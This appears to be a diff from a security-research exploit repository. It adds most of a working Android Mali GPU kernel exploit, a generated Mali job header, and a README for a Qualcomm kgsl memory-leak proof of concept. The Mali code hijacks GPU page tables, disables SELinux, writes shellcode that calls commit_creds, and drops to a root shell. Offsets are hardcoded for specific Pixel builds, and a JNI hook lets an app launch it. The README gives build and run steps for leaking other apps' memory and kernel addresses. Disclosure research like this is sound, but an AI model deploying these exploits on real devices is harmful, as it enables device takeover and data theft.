mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +uint64_t alloc_mem(int mali_fd, unsigned int pages) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void free_mem(int mali_fd, uint64_t gpuaddr) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, 
&mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +void* flush(int idx) { + void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (region == MAP_FAILED) err(1, "flush failed"); + memset(region, idx, FLUSH_SIZE); + return region; +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed"); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +uint32_t hi32(uint64_t x) { + return x >> 32; +} + +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = 
value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) { + avc_deny = AVC_DENY_2211; + sel_read_enforce = SEL_READ_ENFORCE_2211; + fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) { + avc_deny = AVC_DENY_2212; + sel_read_enforce = SEL_READ_ENFORCE_2212; + fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) { + avc_deny = AVC_DENY_2301; + sel_read_enforce = SEL_READ_ENFORCE_2301; + fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301); + return; + } + err(1, "unable to match build id\n"); +} + +void cleanup(int mali_fd, uint64_t pgd) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); +} + +void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 
&(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); +} + +void* shrink_jit_mem(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = arguments[0]; + uint64_t gpu_addr = arguments[1]; + uint64_t pages = arguments[2]; + while (!g_ready_commit) {}; + usleep(10000); + mem_commit(mali_fd, gpu_addr, pages); + return NULL; +} + +void reclaim_freed_pages(int mali_fd) { + for (int i = 0; i < RECLAIM_SIZE; i++) { + reclaim_va[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, JIT_GROUP_ID); + uint64_t* this_va = (uint64_t*)(reclaim_va[i]); + *this_va = 0; + } +} + +uint64_t find_freed_region(int* idx) { + *idx = -1; + for (int i = 0; i < RECLAIM_SIZE; i++) { + uint64_t* this_region = (uint64_t*)(reclaim_va[i]); + uint64_t val = *this_region; + if (val >= 0x41 && val < 0x41 + FREED_NUM) { + *idx = i; + return val - 0x41; + } + } + return -1; +} + +int trigger(int mali_fd2) { + + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, JIT_PAGES, 100, JIT_GROUP_ID); + + g_ready_commit = false; + commit_failed = false; + atom_number = 1; + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + uint64_t first_jit_id = 1; + uint64_t second_jit_id = 2; + + uint64_t jit_addr = jit_allocate(mali_fd, increase_atom_number(), first_jit_id, FREED_NUM, 0, 0, 0, (uint64_t)gpu_alloc_addr); + uint64_t jit_addr2 = jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, 512 - FREED_NUM, 1, 1, (uint64_t)gpu_alloc_addr); + + if (jit_addr % (512 * 0x1000) != 0 || jit_addr2 < jit_addr || jit_addr2 - jit_addr != FREED_NUM * 0x1000) { + LOG("incorrect memory layout\n"); + LOG("jit_addr %lx %lx\n", jit_addr, jit_addr2); + err(1, "incorrect memory layout\n"); + } + + jit_free(mali_fd, increase_atom_number(), second_jit_id); + pthread_t thread; + uint64_t args[3]; + args[0] = mali_fd; + args[1] = jit_addr2; + args[2] = 0; + + pthread_create(&thread, NULL, &shrink_jit_mem, (void*)&(args[0])); + g_ready_commit = true; + jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, GROW_SIZE, 1, 1, (uint64_t)gpu_alloc_addr); + + pthread_join(thread, NULL); + if (commit_failed) { + close(mali_fd); + return -1; + } + jit_free(mali_fd, increase_atom_number(), second_jit_id); + for (int i = 0; i < FLUSH_REGION_SIZE; i++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = jit_addr2; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + flush_regions[i] = flush(i); + if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) { + LOG("region freed\n"); + reclaim_freed_pages(mali_fd); + uint64_t start_addr = jit_addr2 + 0x1000 * (512 - FREED_NUM); + for (int j = 0; j < FREED_NUM; j++) { + write_to(mali_fd, start_addr + j * 0x1000, 0x41 + j, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + } + int idx = -1; + uint64_t offset = find_freed_region(&idx); + if (offset == -1) { + LOG("unable to find region\n"); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) 
munmap(flush_regions[r], FLUSH_SIZE); + close(mali_fd); + return -1; + } + LOG("found region %d at %lx\n", idx, start_addr + offset * 0x1000); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + munmap((void*)(reclaim_va[idx]), 0x1000); + mmap(NULL, 0x1000 * 0x1000, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + + uint64_t pgd = start_addr + offset * 0x1000; + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd); + return 0; + } + } + close(mali_fd); + return -1; +} + +#ifdef SHELL + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + select_offset(); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + map_gpu(mali_fd2, 1, 1, false, 0); + if (!trigger(mali_fd2)) { + system("sh"); + } +} +#else +#include +JNIEXPORT int JNICALL +Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz) +{ + setbuf(stdout, NULL); + setbuf(stderr, NULL); + select_offset(); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + map_gpu(mali_fd2, 1, 1, false, 0); + if (!trigger(mali_fd2)) { + LOG("uid: %d euid %d", getuid(), geteuid()); + return 0; + } + return -1; +} +#endif + diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h new file mode 100644 index 0000000..e0ce432 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h @@ -0,0 +1,260 @@ +#ifndef MIDGARD_H +#define MIDGARD_H + +//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone + +#include +#include +#include +#include +#include +#include +#include + +#define pan_section_ptr(base, A, S) \ + ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET)) + +#define pan_section_pack(dst, A, S, name) \ + for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \ + *_loop_terminate = (void *) (dst); \ + __builtin_expect(_loop_terminate != NULL, 1); \ + ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \ + _loop_terminate = NULL; })) + + +static inline uint64_t +__gen_uint(uint64_t v, uint32_t start, uint32_t end) +{ +#ifndef NDEBUG + const int width = end - start + 1; + if (width < 64) { + const uint64_t max = (1ull << width) - 1; + assert(v <= max); + } +#endif + + return v << start; +} + +static inline uint64_t +__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) +{ + uint64_t val = 0; + const int width = end - start + 1; + const uint64_t mask = (width == 64 ? 
~0 : (1ull << width) - 1 ); + + for (int byte = start / 8; byte <= end / 8; byte++) { + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); + } + + return (val >> (start % 8)) & mask; +} + +enum mali_job_type { + MALI_JOB_TYPE_NOT_STARTED = 0, + MALI_JOB_TYPE_NULL = 1, + MALI_JOB_TYPE_WRITE_VALUE = 2, + MALI_JOB_TYPE_CACHE_FLUSH = 3, + MALI_JOB_TYPE_COMPUTE = 4, + MALI_JOB_TYPE_VERTEX = 5, + MALI_JOB_TYPE_GEOMETRY = 6, + MALI_JOB_TYPE_TILER = 7, + MALI_JOB_TYPE_FUSED = 8, + MALI_JOB_TYPE_FRAGMENT = 9, +}; + +enum mali_write_value_type { + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, +}; + + +struct MALI_WRITE_VALUE_JOB_PAYLOAD { + uint64_t address; + enum mali_write_value_type type; + uint64_t immediate_value; +}; + +struct MALI_JOB_HEADER { + uint32_t exception_status; + uint32_t first_incomplete_task; + uint64_t fault_pointer; + bool is_64b; + enum mali_job_type type; + bool barrier; + bool invalidate_cache; + bool suppress_prefetch; + bool enable_texture_mapper; + bool relax_dependency_1; + bool relax_dependency_2; + uint32_t index; + uint32_t dependency_1; + uint32_t dependency_2; + uint64_t next; +}; + + +static inline void +MALI_JOB_HEADER_pack(uint32_t * restrict cl, + const struct MALI_JOB_HEADER * restrict values) +{ + cl[ 0] = __gen_uint(values->exception_status, 0, 31); + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31); + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63); + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32; + cl[ 4] = __gen_uint(values->is_64b, 0, 0) | + __gen_uint(values->type, 1, 7) | + __gen_uint(values->barrier, 8, 8) | + __gen_uint(values->invalidate_cache, 9, 9) | + __gen_uint(values->suppress_prefetch, 11, 11) | + __gen_uint(values->enable_texture_mapper, 12, 12) | + __gen_uint(values->relax_dependency_1, 14, 14) | + __gen_uint(values->relax_dependency_2, 15, 15) | + __gen_uint(values->index, 16, 31); + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) | + __gen_uint(values->dependency_2, 16, 31); + cl[ 6] = __gen_uint(values->next, 0, 63); + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32; +} + + +#define MALI_JOB_HEADER_LENGTH 32 +struct mali_job_header_packed { uint32_t opaque[8]; }; +static inline void +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl, + struct MALI_JOB_HEADER * restrict values) +{ + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n"); + values->exception_status = __gen_unpack_uint(cl, 0, 31); + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63); + values->fault_pointer = __gen_unpack_uint(cl, 64, 127); + values->is_64b = __gen_unpack_uint(cl, 128, 128); + values->type = __gen_unpack_uint(cl, 129, 135); + values->barrier = __gen_unpack_uint(cl, 136, 136); + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137); + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139); + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140); + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142); + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143); + values->index = __gen_unpack_uint(cl, 144, 159); + values->dependency_1 = __gen_unpack_uint(cl, 160, 175); + values->dependency_2 = __gen_unpack_uint(cl, 176, 191); + values->next = __gen_unpack_uint(cl, 192, 255); +} + +static inline const char * 
+mali_job_type_as_str(enum mali_job_type imm) +{ + switch (imm) { + case MALI_JOB_TYPE_NOT_STARTED: return "Not started"; + case MALI_JOB_TYPE_NULL: return "Null"; + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value"; + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush"; + case MALI_JOB_TYPE_COMPUTE: return "Compute"; + case MALI_JOB_TYPE_VERTEX: return "Vertex"; + case MALI_JOB_TYPE_GEOMETRY: return "Geometry"; + case MALI_JOB_TYPE_TILER: return "Tiler"; + case MALI_JOB_TYPE_FUSED: return "Fused"; + case MALI_JOB_TYPE_FRAGMENT: return "Fragment"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent) +{ + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status); + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task); + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer); + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false"); + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type)); + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false"); + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false"); + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false"); + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false"); + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index); + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1); + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2); + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next); +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl, + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + cl[ 0] = __gen_uint(values->address, 0, 63); + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32; + cl[ 2] = __gen_uint(values->type, 0, 31); + cl[ 3] = 0; + cl[ 4] = __gen_uint(values->immediate_value, 0, 63); + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32; +} + + +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0 + + +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; }; +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl, + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n"); + values->address = __gen_unpack_uint(cl, 0, 63); + values->type = __gen_unpack_uint(cl, 64, 95); + values->immediate_value = __gen_unpack_uint(cl, 128, 191); +} + +static inline const char * +mali_write_value_type_as_str(enum mali_write_value_type imm) +{ + switch (imm) { + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter"; + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp"; + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32"; + case 
MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent) +{ + fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address); + fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type)); + fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value); +} + +struct mali_write_value_job_packed { + uint32_t opaque[14]; +}; + +#define MALI_JOB_HEADER_header \ + .is_64b = true + +#define MALI_WRITE_VALUE_JOB_LENGTH 56 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32 + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md new file mode 100644 index 0000000..cfb7192 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md @@ -0,0 +1,48 @@ +## CVE-2022-25664 + +The write up can be found [here](https://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident). This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app. + +The directory `adreno_user` contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no telling or control over what information is being leaked. To test this, compile with the following command: + +``` +aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user +``` + +and then push `adreno_user` to the device and run it. 
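+For example, with the device connected over `adb` (using `/data/local/tmp` to match the sample session below; any location the shell user can execute from works):
+
+```
+adb push adreno_user /data/local/tmp/
+adb shell /data/local/tmp/adreno_user
+```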
+It should print out non-zero memory content:
+
+```
+flame:/ $ /data/local/tmp/adreno_user
+hexdump(0x50000000, 0x190)
+00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......|
+00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
+00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|
+00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........|
+00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
+.......
+```
+
+The directory `adreno_kernel` contains a proof-of-concept for leaking kernel information to bypass KASLR. It repeatedly triggers the bug and tries to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the macro `KERNEL_BRANCH` in `adreno_kernel.c` should be set to `KERNEL_4` or `KERNEL_5` respectively (these are the `dma_search_type` values defined in `dma_search.h`).
+
+To test, compile with
+
+```
+aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel
+```
+
+and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions:
+
+```
+flame:/ $ /data/local/tmp/adreno_kernel
+found dma fence object:
+kgsl_syncsource_fence_ops address: ffffff9daaea8b48
+object address: fffffffe116100a0
+syncsource address: fffffffe0b244480
+```
+
+It has been tested on a number of devices. The time it takes (which depends on the success rate of a single leak) varies across devices: it is relatively quick on the Pixel 4, but takes longer on the Samsung Z Flip 3.
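+To find out which kernel branch a particular device runs before picking the value, checking the kernel release string is enough (a quick sanity check, not part of the exploit itself):
+
+```
+adb shell uname -r
+```
+
+This prints something like `4.14.xxx` on the 4.x branch or `5.4.xxx` on the 5.x branch.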
